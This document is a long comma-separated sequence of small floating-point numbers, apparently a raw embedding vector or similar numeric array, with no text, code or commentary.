-0.026227500289678574, -0.01928229071199894, 0.01265073660761118, -0.038952916860580444, 0.034292906522750854, 0.0068854657001793385, -0.00849107839167118, 0.027855517342686653, -0.0066203526221215725, 0.03241097554564476, 0.006295496132224798, -0.012762756086885929, 0.029901741072535515, -0.003487540641799569, 0.017758825793862343, -0.020536908879876137, -0.009357362985610962, -0.0032616346143186092, 0.051230255514383316, 0.02598852477967739, -0.013054006733000278, 0.00918559916317463, -0.044299982488155365, 0.023329928517341614, -0.027198337018489838, 0.014196605421602726, 0.00849107839167118, 0.022388964891433716, 0.030588792636990547, 0.01188153587281704, -0.004077509976923466, 0.02113434672355652, 0.029812125489115715, -0.031126486137509346, -0.0112467585131526, -0.03202264383435249, -0.00948431808501482, 0.009521657600998878, 0.0017540387343615294, -0.03961009904742241, -0.02603333257138729, -0.05254461616277695, 0.012120510451495647, -0.031574565917253494, -0.03273956850171089, 0.04531562328338623, -0.009021304547786713, -0.0030674675945192575, -0.01265073660761118, -0.051499102264642715, -0.04059587046504021, -0.01260592881590128, 0.015817154198884964, -0.01983492076396942, -0.00290317228063941, 0.0431947223842144, -0.006153604947030544, -0.009267747402191162, 0.004383696708828211, 0.00896156020462513, -0.004775764886289835, -0.011485733091831207, 0.053620003163814545, 0.0112915663048625, 0.00045787973795086145, 0.0226727481931448, 0.004678681492805481, 0.005731664597988129, 0.025107305496931076, 0.014816447161138058, -0.0021918483544141054, -0.014876190572977066, 0.00799072440713644, -0.014495324343442917, -0.005156631115823984, 0.0052649169228971004, 0.00849107839167118, 0.023016273975372314, 0.006351505871862173, 0.015488564036786556, 0.015354140661656857, -0.004932592157274485, -0.006922805681824684, -0.03722034767270088, -0.014353432692587376, 0.0016186818247660995, -0.012023426592350006, 0.00580634456127882, 0.0007850700640119612, -0.00926027912646532, -0.009267747402191162, -0.00923787523061037, 0.024136468768119812, 0.014928466640412807, 0.007916045375168324, 0.01117954682558775, -0.030409561470150948, -0.01575740985572338, 0.025271600112318993, -0.0013433005660772324, -0.025465767830610275, -0.006605417001992464, 0.03590598702430725, 0.006078924983739853, 0.003192555857822299, -0.020521974191069603, 0.00308427051641047, 0.00240468536503613, 0.020581716671586037, -0.03256033733487129, -0.025644998997449875, 0.024046853184700012, -0.01150066964328289, -0.020492101088166237, -0.017280876636505127, -0.041671257466077805, 0.014398240484297276, -0.0425674133002758, -0.004365026950836182, -0.041581641882658005, 0.02846788987517357, -0.00928268302232027, 0.025047561153769493, 0.013935226947069168, -0.020163511857390404, -0.023300057277083397, 0.0036630379036068916, 0.04125304892659187, 0.04128292202949524, 0.006758510135114193, -0.0024756311904639006, -0.01242669764906168, 0.043792158365249634, -0.019625818356871605, -0.0010259120026603341, -0.006639022845774889, -0.025659935548901558, 0.045524727553129196, -0.00476456293836236, 0.014629747718572617, -0.0028658322989940643, 0.037280090153217316, 0.008364123292267323, -0.023210441693663597, -0.026496347039937973, 0.05675654858350754, -0.035517651587724686, 0.0036387669388204813, -0.029274430125951767, 0.042537540197372437, -0.000663715589325875, 0.013785867020487785, -0.013457276858389378, 0.0032410977873951197, 0.010880827903747559, -0.012053298763930798, -0.00006575311999768019, 0.016444463282823563, 0.0107090650126338, 0.0064037819392979145, 0.0010697862599045038, 0.013009198941290379, 0.009790505282580853, 0.016922414302825928, 0.014211541041731834, 0.00792351271957159, -0.01073146890848875, -0.01607106439769268, -0.003961756359785795, 0.007352213375270367, -0.022986402735114098, 0.023419544100761414, -0.05048345774412155, 0.002160109579563141, 0.000976436713244766, -0.009036240167915821, 0.005347064230591059, -0.027736030519008636, -0.008140084333717823, 0.0046600112691521645, -0.016145745292305946, -0.013330320827662945, -0.013345257379114628, -0.01720619574189186, 0.020253127440810204, -0.04047638177871704, -0.01747504249215126, 0.031245974823832512, 0.0018837946699932218, -0.015608050860464573, 0.012807563878595829, 0.0031010734383016825, -0.01852055825293064, -0.0011491334298625588, -0.00265299528837204, -0.005955703556537628, -0.01941671408712864, -0.023598775267601013, 0.019088122993707657, -0.004114849958568811, 0.007692005950957537, 0.00480937073007226, 0.004730957094579935, -0.011119803413748741, -0.01937190629541874, 0.029095198959112167, -0.008229699917137623, -0.04603254795074463, -0.03181353956460953, 0.03276943787932396, 0.029573149979114532, -0.0017857776256278157, -0.03396431356668472, 0.03659303858876228, 0.022478580474853516, 0.021209025755524635, 0.05266410484910011, -0.028542570769786835, 0.015832090750336647, 0.012874775566160679, 0.0217765923589468, -0.00555616756901145, 0.00989505648612976, 0.042477797716856, 0.007049760781228542, -0.05257448926568031, 0.02969263680279255, -0.020268062129616737, 0.010313262231647968, 0.02095511555671692, -0.01256112102419138, -0.03142520412802696, 0.0022945329546928406, -0.010193775407969952, -0.03940099477767944, 0.04005817696452141, -0.00596317183226347, -0.0573241151869297, -0.03127584606409073, 0.024016981944441795, 0.03169405087828636, -0.0006133068236522377, -0.027048977091908455, -0.015652859583497047, 0.014622279442846775, -0.0018744597909972072, -0.011694836430251598, -0.005078217480331659, -0.021612295880913734, 0.0026866011321544647, 0.008117680437862873, -0.019849857315421104, 0.008677777834236622, 0.04477792978286743, -0.022657811641693115, -0.0019659423269331455, -0.004450908396393061, 0.02407672628760338, 0.01919267512857914, -0.005996777676045895, 0.037817783653736115, 0.04137253761291504, -0.004622671753168106, -0.015003145672380924, 0.0022385232150554657, -0.043344080448150635, -0.017669210210442543, 0.0014114457881078124, 0.00600797962397337, -0.010806147940456867, -0.016802925616502762, -0.016922414302825928, -0.003177620004862547, 0.010626916773617268, 0.001289157778955996, -0.009715825319290161, 0.012934518977999687, 0.00917066354304552, -0.011911407113075256, -0.013009198941290379, 0.0008606832125224173, -0.004895252641290426, -0.0023990843910723925, -0.017131516709923744, 0.003235496813431382, 0.002906906185671687, -0.0027967537753283978, 0.009947332553565502, -0.025406023487448692, 0.017714018002152443, -0.003935618791729212, -0.006926539354026318, -0.0037899932358413935, -0.030618665739893913, -0.0013050272827968001, -0.009222939610481262, 0.021716848015785217, 0.03739957883954048, 0.013322853483259678, -0.03285905346274376, 0.017728954553604126, -0.005817546509206295, -0.012680607847869396, -0.0045517259277403355, -0.023016273975372314, 0.01226987037807703, 0.005324660334736109, -0.025226792320609093, 0.019386842846870422, 0.006889199838042259, -0.00612373324111104, -0.004140987526625395, 0.024883266538381577, 0.002232922241091728, -0.016235360875725746, 0.010873359628021717, -0.03668265417218208, 0.00799072440713644, 0.004159657750278711, -0.02046222984790802, -0.0019547403790056705, -0.0011846062261611223, -0.008177423849701881, 0.02734769508242607, -0.013188430108129978, -0.009992140345275402, -0.029662765562534332, -0.03730996325612068, 0.00043407559860497713, -0.0220902469009161, 0.02268768474459648, 0.008767393417656422, -0.013151089660823345, 0.00914825964719057, -0.014368368312716484, -0.039998430758714676, 0.015861961990594864, 0.020805755630135536, -0.015876898542046547, -0.0225383248180151, 0.006762244272977114, -0.012680607847869396, -0.00891675241291523, 0.035517651587724686, 0.0008261438342742622, 0.005989309400320053, 0.01823677495121956, -0.02661583386361599, 0.00046698132064193487, -0.020925244316458702, 0.024972882121801376, 0.015682730823755264, -0.02516704984009266, 0.02349422499537468, 0.00975316483527422, 0.03733983635902405, 0.021896079182624817, -0.01725100353360176, -0.018595237284898758, -0.009058644063770771, 0.03033488243818283, -0.015085293911397457, 0.006176008842885494, -0.0049998038448393345, -0.011642560362815857, 0.007621060591191053, -0.0028639654628932476, 0.009656081907451153, 0.012083170935511589, -0.016668502241373062, -0.0003640633949544281, -0.01566779427230358, 0.012329613789916039, 0.0075426469556987286, 0.012867307290434837, -0.024046853184700012, -0.01910305954515934, 0.004555460065603256, 0.007053494919091463, -0.012598460540175438, 0.0022739958949387074, 0.014786574989557266, 0.013292981311678886, 0.03602547198534012, -0.03865419700741768, 0.012956922873854637, -0.025226792320609093, -0.003659303765743971, 0.01183672808110714, -0.023061081767082214, 0.008744989521801472, -0.025002753362059593, 0.00011102766438852996, 0.018864084035158157, -0.006784648168832064, -0.018669918179512024, 0.024375444278120995, -0.013614104129374027, -0.010268454439938068, -0.033157773315906525, 0.013203365728259087, 0.017818570137023926, -0.022896787151694298, -0.02467416413128376, 0.01108993124216795, 0.016922414302825928, -0.02670544944703579, -0.01156788133084774, -0.016728246584534645, -0.021074602380394936, -0.03626444935798645, 0.013763463124632835, -0.03256033733487129, -0.0046264054253697395, -0.0036537027917802334, -0.01061198115348816, 0.028482826426625252, -0.00037596546462737024, 0.021209025755524635, -0.01172470860183239, 0.003509944537654519, 0.00499233603477478, -0.0109331039711833, 0.02784058079123497, -0.006579278968274593, -0.00272207404486835, 0.01197115145623684, -0.03136546164751053, 0.022433772683143616, -0.026272308081388474, 0.03064853698015213, 0.022926658391952515, 0.02639179490506649, 0.01134384237229824, -0.0014870589366182685, -0.011941279284656048, -0.01607106439769268, 0.018042609095573425, -0.004320219159126282, 0.038176245987415314, -0.00016826263163238764, -0.016623694449663162, -0.029528342187404633, 0.03503970056772232, -0.026093076914548874, -0.00455919373780489, 0.004144721664488316, -0.015951577574014664, -0.023464351892471313, -0.040715355426073074, -0.016952285543084145, -0.0054590837098658085, 0.00002100365782098379, 0.010104159824550152, 0.029856933280825615, 0.018027672544121742, 0.008483611047267914, 0.012635800056159496, 0.0006170407868921757, 0.00834918674081564, 0.01002947986125946, -0.010238583199679852, 0.03205251321196556, -0.008453738875687122, 0.010761340148746967, 0.004208199679851532, -0.024524804204702377, -0.004260475281625986, 0.0024943009484559298, -0.007363415323197842, -0.01145586185157299, -0.05200692266225815, 0.0054441480897367, -0.00970835704356432, -0.009626209735870361, -0.025510575622320175, -0.005052079912275076, 0.02367345616221428, -0.03020045906305313, -0.011978618800640106, 0.005500157829374075, -0.015697667375206947, 0.011672432534396648, 0.03725022077560425, 0.0007248595356941223, 0.006892933510243893, 0.011575348675251007, 0.016817862167954445, 0.014988210052251816, -0.026406731456518173, 0.01041034609079361, -0.024704035371541977, -0.031933028250932693, 0.00546655198559165, 0.0001752638490870595, -0.014084585942327976, -0.05385897681117058, -0.008453738875687122, 0.040356893092393875, 0.037459321320056915, 0.00858069397509098, -0.021836334839463234, -0.024972882121801376, -0.04594293236732483, -0.005052079912275076, -0.0025428428780287504, 0.011597752571105957, -0.02005895972251892, -0.0211492832750082, 0.0015290662413462996, 0.041671257466077805, 0.0048915185034275055, -0.024524804204702377, 0.02095511555671692, 0.014532663859426975, 0.015593115240335464, -0.01580221764743328, -0.03907240554690361, -0.016773054376244545, -0.004006564151495695, -0.04161151126027107, 0.026511283591389656, -0.001492659910582006, 0.058728091418743134, -0.008028064854443073, 0.0026156555395573378, -0.00975316483527422, 0.019342035055160522, -0.004118583630770445, -0.02403191849589348, -0.0069601451978087425, 0.00825957115739584, 0.01244910154491663, 0.011485733091831207, -0.0035566193982958794, -0.017893249168992043, -0.00471975514665246, 0.012419229373335838, 0.04083484411239624, 0.002085429849103093, -0.024121534079313278, -0.005858620163053274, -0.009783037006855011, -0.044748060405254364, -0.02721327170729637, 0.022851979359984398, 0.027810709550976753, -0.010440218262374401, -0.01693734899163246, 0.017908185720443726, -0.0013199631357565522, -0.025630062445998192, -0.006493397522717714, -0.031843412667512894, -0.03073815256357193, -0.023792942985892296, -0.01856536604464054, -0.008976496756076813, -0.017236068844795227, 0.0069937510415911674, -0.019312163814902306, -0.00794591661542654, -0.019222546368837357, 0.017982864752411842, 0.019446587190032005, 0.016100937500596046, -0.01262833271175623, -0.016743183135986328, 0.01575740985572338, 0.00909598357975483, -0.040536124259233475, 0.016489271074533463, -0.00823716726154089, -0.03423316031694412, 0.0003460936131887138, -0.01819196715950966, 0.0013283645967021585, 0.02603333257138729, 0.006646490655839443, 0.016907477751374245, -0.0034483338240534067, -0.03480072692036629, -0.01231467816978693, 0.003916948568075895, -0.025152113288640976, -0.00267726625315845, 0.04695857688784599, -0.018206903710961342, -0.0111123351380229, -0.017728954553604126, -0.009700889699161053, 0.031305719166994095, -0.021657103672623634, 0.0032635016832500696, 0.030887512490153313, -0.00013045604282524437, 0.005108089651912451, -0.05188743397593498, 0.02309095486998558, -0.01238188985735178, 0.004716021008789539, -0.03205251321196556, -0.007408223580569029, -0.02683987282216549, -0.025510575622320175, -0.01702696457505226, 0.0036630379036068916, -0.004828040953725576, -0.0017615067772567272, -0.0077816215343773365, 0.012150382623076439, 0.04173099994659424, -0.01127663068473339, -0.008087808266282082, -0.025062497705221176, 0.013868015259504318, 0.021448001265525818, -0.0022627939470112324, -0.009678485803306103, -0.020626524463295937, -0.03408380225300789, 0.03820611909031868, 0.025839166715741158, 0.042806386947631836, -0.02436050772666931, -0.02603333257138729, -0.026914553716778755, -0.010948039591312408, -0.0016905610682442784, 0.03722034767270088, -0.012202657759189606, 0.006329101976007223, 0.022941594943404198, 0.03196289762854576, 0.00530599057674408, 0.01616067998111248, 0.0001896163448691368, 0.009036240167915821, -0.0019622084219008684, -0.007158046588301659, 0.014711895026266575, -0.028079556301236153, -0.02014857530593872, 0.012098106555640697, 0.03521893173456192, 0.013360192999243736, -0.044658444821834564, -0.018580302596092224, -0.01756465807557106, 0.015727538615465164, 0.005320926662534475, 0.007714409846812487, -0.0025951184798032045, -0.02616775594651699, 0.029722509905695915, -0.010806147940456867, 0.047556012868881226, -0.019491394981741905, -0.01979011297225952, 0.003144014161080122, -0.00909598357975483, -0.0032560336403548717, 0.02449493296444416, -0.009790505282580853, -0.006217082496732473, -0.010918167419731617, 0.013651443645358086, -0.022837042808532715, -0.023733198642730713, -0.021582424640655518, -0.012785159982740879, 0.007916045375168324, 0.0008536819950677454, 0.015682730823755264, 0.0037377176340669394, 0.004768297076225281, -0.01138865016400814, -0.032799310982227325, 0.034113675355911255, -0.019715433940291405, 0.0054254778660833836, -0.01914786733686924, -0.006702500395476818, -0.013360192999243736, 0.0024943009484559298, -0.008020596578717232, 0.002072360832244158, 0.0224039014428854, -0.04785473272204399, 0.006907869596034288, 0.0042007314041256905, -0.040984202176332474, 0.013509552925825119, -0.01073146890848875, -0.015167441219091415, -0.025376152247190475, 0.016862669959664345, -0.02318057045340538, -0.03892304375767708, 0.0006161073106341064, 0.022374030202627182, 0.08202815055847168, 0.007744282018393278, -0.0068742637522518635, -0.030573857948184013, -0.0006665160763077438, -0.0005208906950429082, 0.01981998421251774, 0.02427089214324951, 0.012165318243205547, 0.0029050391167402267, 0.0434635691344738, -0.016056129708886147, -0.0030133246909826994, 0.007632262539118528, 0.014599875546991825, 0.011933811008930206, -0.0226279404014349, -0.004133519716560841, 0.010970443487167358, 0.008707650005817413, 0.00799072440713644, 0.0022067842073738575, 0.017191261053085327, 0.0033493831288069487, 0.020925244316458702, -0.017012029886245728, -0.012620864436030388, -0.03363572433590889, -0.017504915595054626, -0.019625818356871605, -0.008296911604702473, 0.0022273212671279907, -0.027273016050457954, -0.00853588618338108, 0.0113363740965724, -0.0017353688599541783, 0.012195190414786339, -0.0007015221635811031, -0.007389553356915712, -0.02331499382853508, 0.017355555668473244, -0.0032093587797135115, -0.009446978569030762, 0.001760573242790997, 0.008610566146671772, -0.025570319965481758, 0.028034748509526253, 0.017460107803344727, -0.02059665322303772, -0.0040924460627138615, 0.0050110057927668095, -0.015921706333756447, 0.02833346650004387, 0.029259495437145233, 0.006657692603766918, 0.0213733222335577, -0.013442340306937695, -0.00521637499332428, -0.022075310349464417, -0.015369076281785965, -0.006859327666461468, 0.017624402418732643, -0.011829259805381298, 0.011874067597091198, 0.014420644380152225, -0.02358384057879448, -0.018893957138061523, -0.004745893180370331, 0.007169248536229134, 0.025316407904028893, 0.029483534395694733, -0.012105574831366539, 0.002436424372717738, -0.002623123349621892, 0.014592407271265984, 0.014263817109167576, -0.019864792004227638, -0.00224599102512002, -0.019431650638580322, -0.02924455888569355, 0.03674239665269852, -0.00130409374833107, 0.015817154198884964, 0.03273956850171089, -0.01734061911702156, 0.01856536604464054, -0.009454445913434029, 0.006340303923934698, 0.0013059607008472085, 0.0012648869305849075, 0.005052079912275076, 0.0061498708091676235, 0.012553652748465538, 0.007886173203587532, 0.0023804144002497196, 0.0213285144418478, -0.0056905909441411495, -0.028676994144916534, -0.017460107803344727, -0.00998467206954956, 0.016220424324274063, -0.008819669485092163, 0.0219110157340765, -0.0012014091480523348, -0.012852371670305729, 0.02376307174563408, 0.002012617187574506, 0.0061610727570950985, 0.01185913197696209, -0.0021059666760265827, -0.042896002531051636, -0.03557739406824112, 0.0012172786518931389, -0.02801981195807457, -0.004014032427221537, 0.022881850600242615, 0.009125855751335621, -0.003343782154843211, -0.01244910154491663, -0.019162803888320923, -0.01720619574189186, -0.006448589731007814, 0.024002045392990112, -0.00794591661542654, -0.00952912587672472, 0.018640045076608658, -0.009544061496853828, -0.01693734899163246, 0.05170820280909538, 0.03226161748170853, 0.02117915451526642, 0.01983492076396942, -0.013001730665564537, -0.0007995392079465091, 0.016354847699403763, -0.041133563965559006, 0.01738542690873146, 0.0027314089238643646, 0.0022049173712730408, -0.007893641479313374, -0.008311847224831581, 0.037967145442962646, 0.029707573354244232, -0.0008835538756102324, 0.019356971606612206, 0.000633376941550523, 0.021433064714074135, 0.014853786677122116, 0.011448393575847149, 0.023434480652213097, 0.0215973611921072, -0.013830674812197685, 0.010903231799602509, 0.04050625488162041, 0.012941987253725529, -0.0049027204513549805, 0.005544965621083975, -0.033665597438812256, 0.0007649998879060149, 0.023076018318533897, 0.02376307174563408, 0.035517651587724686, 0.015727538615465164, -0.001964075258001685, 0.004099913872778416, 0.027183400467038155, -0.012747819535434246, -0.04907948151230812, -0.02268768474459648, -0.02987186796963215, 0.006792115978896618, 0.015876898542046547, -0.008289443328976631, 0.0031570831779390574, 0.013405000790953636, 0.02380787953734398, -0.024226084351539612, 0.001070719794370234, 0.02933417446911335, -0.01054476946592331, -0.010335666127502918, 0.027646414935588837, 0.001673758146353066, 0.006881731562316418, 0.02973744459450245, -0.013808270916342735, 0.006388845853507519, 0.005070749670267105, -0.03303828462958336, 0.027511991560459137, 0.015428819693624973, 0.02842308208346367, -0.0223590936511755, -0.00867030955851078, -0.02322537824511528, -0.02304614707827568, -0.01829651929438114, -0.01095550786703825, -0.00814755167812109, 0.02476377971470356, -0.006000511348247528, -0.018849149346351624, -0.013091346248984337, 0.011060059070587158, -0.005791408475488424, -0.020850563421845436, -0.001617748406715691, 0.015152505598962307, -0.0107986805960536, -0.015384011901915073, -0.02037261426448822, 0.01725100353360176, 0.012956922873854637, 0.010044415481388569, 0.014189137145876884, -0.00052789191249758, 0.00564951729029417, -0.02398711070418358, -0.0032560336403548717, 0.022254541516304016, -0.0428362600505352, 0.028124364092946053, 0.00920800305902958, 0.0020910308230668306, -0.02113434672355652, -0.0058324821293354034, 0.029349111020565033, -0.024733906611800194, 0.0013937093317508698, 0.0013731725048273802, -0.010290858335793018, -0.003965490497648716, 0.005612177308648825, 0.005847418215125799, -0.011172078549861908, -0.002234789077192545, -0.013868015259504318, 0.010216179303824902, 0.004663745407015085, -0.020029088482260704, -0.01620548777282238, 0.027317823842167854, -0.02815423533320427, -0.0024905670434236526, -0.012456568889319897, -0.00023045678972266614, 0.00026137885288335383, -0.010529833845794201, -0.009783037006855011, 0.020895371213555336, -0.0211940910667181, -0.0007776020793244243, 0.0029498469084501266, -0.027034040540456772, -0.0053732022643089294, 0.02969263680279255, 0.01132143847644329, 0.005892226006835699, -0.001127663068473339, 0.023076018318533897, 0.003668638877570629, -0.013688784092664719, 0.0031272112391889095, 0.00900636799633503, -0.019312163814902306, 0.03220187500119209, 0.013046538457274437, -0.005085685756057501, 0.009155727922916412, 0.012090638279914856, 0.01032073050737381, -0.005791408475488424, 0.018983572721481323, -0.006310432218015194, -0.019312163814902306, 0.017549723386764526, -0.0013563694665208459, -0.023703327402472496, -0.01611587218940258, 0.003237363649532199, 0.0008340785861946642, 0.04609229415655136, 0.004962464328855276, -0.02427089214324951, 0.00022030502441339195, -0.021970760077238083, -0.035876113921403885, -0.0038217322435230017, -0.002027553040534258, -0.016578886657953262, 0.011037655174732208, 0.001557071111164987, -0.021940886974334717, -0.030185522511601448, 0.029438726603984833, -0.0075426469556987286, -0.014644683338701725, 0.038594454526901245, -0.006541938986629248, -0.00020011818560305983, 0.01959594525396824, 0.021477872505784035, 0.013479680754244328, 0.014323560521006584, 0.0034744716249406338, -0.00878232903778553, -0.013726123608648777, -0.005914629902690649, 0.0112915663048625, -0.007314873859286308, -0.003732116660103202, -0.020088830962777138, -0.01589183323085308, -0.029662765562534332, 0.0066427565179765224, 0.002759413793683052, 0.016265232115983963, 0.007419425528496504, -0.0024756311904639006, -0.00902877189218998, 0.007075898814946413, -0.016324976459145546, -0.014741767197847366, -0.02539108879864216, -0.01061198115348816, 0.0011902072001248598, -0.01843094266951084, 0.0029946547001600266, 0.015339204110205173, -0.028124364092946053, 0.017056837677955627, 0.01571260206401348, 0.022209733724594116, -0.009200535714626312, 0.0012564854696393013, -0.011597752571105957, 0.006934007629752159, 0.008498546667397022, -0.0214629378169775, -0.004768297076225281, -0.03506957367062569, 0.005836216267198324, -0.015279460698366165, -0.0017101644771173596, 0.0211940910667181, 0.015996385365724564, 0.0006697832723148167, 0.013755995780229568, 0.001470256014727056, -0.035248804837465286, -0.016907477751374245, -0.014808978885412216, -0.007266331929713488, 0.004577863961458206, -0.007464233320206404, 0.01027592271566391, -0.006134935189038515, -0.010948039591312408, 0.003958022687584162, -0.015145037323236465, -0.0033493831288069487, 0.005559901706874371, -0.0068854657001793385, -0.004309017211198807, 0.0056793889962136745, 0.00814755167812109, -0.011933811008930206, 0.02068626880645752, 0.01887902058660984, -0.017325684428215027, -0.0032784375362098217, 0.006497131194919348, 0.001708297524601221, 0.026108013466000557, 0.011104866862297058, 0.004163391422480345, 0.028393210843205452, -0.01633991114795208, -0.007034825161099434, 0.027407439425587654, -0.00528358668088913, -0.002219853224232793, 0.002208651276305318, -0.0014833249151706696, -0.04424023628234863, 0.01188153587281704, -0.016802925616502762, 0.012478972785174847, 0.003717180574312806, -0.014077117666602135, 0.03318764641880989, 0.021627232432365417, 0.013255641795694828, 0.034113675355911255, 0.017504915595054626, -0.0049027204513549805, 0.01707177236676216, 0.016728246584534645, -0.016638631001114845, 0.00966354925185442, 0.01769908145070076, 0.01020871102809906, 0.015257056802511215, 0.017639338970184326, -0.012098106555640697, 0.00948431808501482, 0.006717436481267214, -0.02911013551056385, 0.022433772683143616, -0.00003378088149474934, 0.007258864119648933, -0.01014149934053421, 0.02335980162024498, -0.005515093915164471, 0.009058644063770771, -0.007871237583458424, -0.013711187988519669, -0.022135054692626, -0.004073775839060545, 0.004596533719450235, 0.012755287811160088, 0.01253871712833643, -0.012792627327144146, -0.030947254970669746, 0.014794043265283108, -0.02014857530593872, 0.01161268912255764, -0.003063733456656337, 0.007243928033858538, 0.0033885901793837547, 0.007068431004881859, 0.03006603568792343, 0.02349422499537468, -0.00937229860574007, 0.025869037955999374, -0.002740744035691023, 0.0029535810463130474, -0.0075986566953361034, 0.010514897294342518, 0.005186503287404776, 0.006676362361758947, 0.00871511735022068, 0.0022142522502690554, -0.00921547133475542, 0.004633873701095581, -0.013173493556678295, 0.007669602055102587, -0.015398948453366756, -0.015443756245076656, 0.00199768110178411, 0.01598144881427288, 0.0034688706509768963, 0.00399536220356822, 0.00918559916317463, 0.012456568889319897, -0.00799072440713644, -0.005817546509206295, 0.00523877888917923, 0.003517412580549717, 0.012934518977999687, 0.010761340148746967, -0.012523780576884747, 0.028303595259785652, 0.012284805998206139, 0.011403585784137249, 0.01970049738883972, 0.015384011901915073, -0.004417302552610636, -0.008334251120686531, -0.012001022696495056, 0.027138592675328255, -0.004458376206457615, -0.0005096887471154332, 0.002503636060282588, 0.0030562656465917826, -0.022015567868947983, -0.014965806156396866, -0.01901344396173954, 0.0009138924651779234, 0.0015505367191508412, -0.0018408538307994604, 0.011328905820846558, -0.003463269677013159, -0.003872141009196639, -0.002701536985114217, 0.019401779398322105, 0.0020182181615382433, 0.006276826374232769, 0.007729345932602882, 0.0033195114228874445, 0.004574129823595285, 0.008954092860221863, -0.01669837348163128, 0.01249390933662653, 0.023076018318533897, 0.00206489278934896, -0.01086589228361845, 0.021477872505784035, 0.026242436841130257, 0.010634385049343109, -0.010836020112037659, -0.006131201051175594, 0.012688076123595238, -0.0030394624918699265, 0.013300449587404728, -0.006082659121602774, -0.013337789103388786, -0.00292557617649436, 0.017714018002152443, -0.021074602380394936, 0.005765270441770554, 0.0038534710183739662, 0.005500157829374075, 0.003692909609526396, -0.006836923770606518, 0.004294081125408411, -0.019625818356871605, 0.0017288343515247107, -0.01968556083738804, 0.006497131194919348, 0.0036537027917802334, 0.009402170777320862, -0.004028968047350645, -0.014629747718572617, -0.003924416843801737, 0.008334251120686531, -0.00521637499332428, 0.011978618800640106, -0.00458159763365984, -0.012508844956755638, 0.004686149302870035, -0.010918167419731617, -0.005978107452392578, -0.0023206707555800676, -0.015428819693624973, -0.00853588618338108, 0.024823522195219994, -0.007355947513133287, 0.023016273975372314, -0.020790820941329002, 0.0032747036311775446, -0.009715825319290161, -0.0012014091480523348, 0.038235992193222046, 0.0033885901793837547, -0.021522680297493935, 0.0037153137382119894, -0.023120826110243797, -0.016011321917176247, 0.016130808740854263, 0.0015346672153100371, -0.01194874756038189, -0.011799387633800507, -0.014861254952847958, -0.0054889558814466, 0.020925244316458702, -0.013367661274969578, 0.0002443425473757088, -0.007501572836190462, 0.023120826110243797, -0.012882242910563946, -0.014465452171862125, 0.004428504500538111, 0.014689491130411625, 0.009932396002113819, 0.02309095486998558, -0.002104099839925766, 0.010948039591312408, -0.0036779737565666437, -0.024300765246152878, -0.00297038396820426, 0.008573226630687714, -0.00814755167812109, 0.013173493556678295, -0.005544965621083975, 0.00476456293836236, 0.0075986566953361034, -0.007811493705958128, 0.0056905909441411495, 0.006687564309686422, 0.008393995463848114, 0.01197115145623684, -0.01170230470597744, -0.005507625639438629, -0.0007696673856116831, -0.010425281710922718, 0.00873752124607563, -0.025450831279158592, -0.013793335296213627, -0.0020070162136107683, -0.007826429791748524, 0.02108953893184662, -0.013688784092664719, 0.00614613713696599, -0.0045181200839579105, -0.0065979487262666225, -0.03590598702430725, 0.005052079912275076, -0.00014457516954280436, 0.0019267355091869831, -0.012508844956755638, 0.01611587218940258, -0.017146453261375427, -0.0068406579084694386, -0.014935933984816074, 0.00455919373780489, 0.01941671408712864, 0.013180961832404137, -0.021582424640655518, -0.017579594627022743, 0.0017166989855468273, -0.012172786518931389, 0.002781817689538002, 0.00037036449066363275, -0.012956922873854637, 0.00794591661542654, -0.000246909650741145, -0.007557582575827837, -0.010671724565327168, -0.02286691591143608, 0.019760241732001305, 0.0025129709392786026, -0.00437996257096529, 0.0007192585617303848, 0.011067527346313, 0.011762048117816448, 0.022194799035787582, 0.007120706606656313, 0.005074483808130026, -0.017146453261375427, 0.006605417001992464, 0.029169879853725433, 0.009088516235351562, 0.021716848015785217, 0.0018791272304952145, 0.022149991244077682, -0.017997801303863525, 0.00424553919583559, 0.016399655491113663, 0.007016154937446117, -0.0016532212030142546, -0.018251711502671242, -0.006228284444659948, -0.001002574572339654, -0.014704426750540733, 0.002005149144679308, 0.018177032470703125, -0.03011084347963333, 0.0022758629638701677, 0.009536594152450562, 0.015040486119687557, 0.020447293296456337, -0.004574129823595285, 0.016907477751374245, 0.022388964891433716, -0.01796792820096016, -0.02380787953734398, -0.013800803571939468, -0.00828197505325079, 0.004794434644281864, 0.018938764929771423, 0.0036854417994618416, -0.015107697807252407, 0.009738229215145111, 0.008289443328976631, -0.0017708416562527418, -0.006239486392587423, 0.0021134347189217806, 0.013905354775488377, 0.016728246584534645, -0.009969736449420452, 0.015518435277044773, -0.012045830488204956, -0.009133324027061462, -0.005660719238221645, -0.0213285144418478, -0.01100031565874815, -0.010761340148746967, -0.01955113746225834, -0.0030506644397974014, -0.004301548935472965, -0.016041193157434464, -0.008162488229572773, -0.005485221743583679, 0.0014833249151706696, -0.020970052108168602, -0.013965098187327385, -0.0016224158462136984, -0.012262402102351189, -0.0037563873920589685, 0.012307209894061089, 0.005847418215125799, 0.015279460698366165, -0.013576764613389969, -0.0041559236124157906, -0.0592060424387455, -0.013942694291472435, 0.01638471893966198, -0.016190553084015846, 0.0037265156861394644, 0.006728638429194689, -0.0026399262715131044, -0.0011285964865237474, 0.0022739958949387074, -0.0012835568049922585, 0.011709772050380707, -0.013375128619372845, 0.0068406579084694386, 0.008207296021282673, 0.0061834766529500484, 0.027452247217297554, -0.017101645469665527, -0.0038105302955955267, -0.0044546425342559814, -0.004118583630770445, 0.013180961832404137, 0.0000987755338428542, -0.015682730823755264, 0.012800095602869987, -0.007430627476423979, -0.020268062129616737, 0.010081755928695202, -0.006385111715644598, -0.006683830637484789, 0.0018744597909972072, -0.013016666285693645, -0.02335980162024498, -0.007273799739778042, -0.01992453634738922, 0.019386842846870422, 0.027063913643360138, 0.0053507983684539795, 0.04585331678390503, -0.0006515801069326699, -0.000024431337806163356, -0.010701596736907959, -0.004043904133141041, -0.03136546164751053, -0.014599875546991825, -0.0014338496839627624, 0.03793727234005928, 0.0016420192550867796, 0.013091346248984337, 0.005179035011678934, 0.0008172756643034518, 0.002778083784505725, 0.00001683209848124534, 0.008520950563251972, -0.017669210210442543, 0.020611589774489403, -0.004398632794618607, 0.010858424007892609, -0.02612294815480709, 0.005686856806278229, 0.008117680437862873, 0.0021843803115189075, -0.010604512877762318, -0.006254422478377819, 0.010216179303824902, -0.02937898226082325, -0.00458533177152276, -0.0017689747037366033, 0.033247388899326324, 0.010694128461182117, 0.02041742205619812, 0.014308624900877476, -0.001557071111164987, -0.019401779398322105, -0.012217594310641289, 0.00009644179226597771, 0.000784136529546231, 0.01571260206401348, 0.028303595259785652, -0.0032859055791050196, 0.003524880390614271, -0.005227576941251755, 0.01049996167421341, 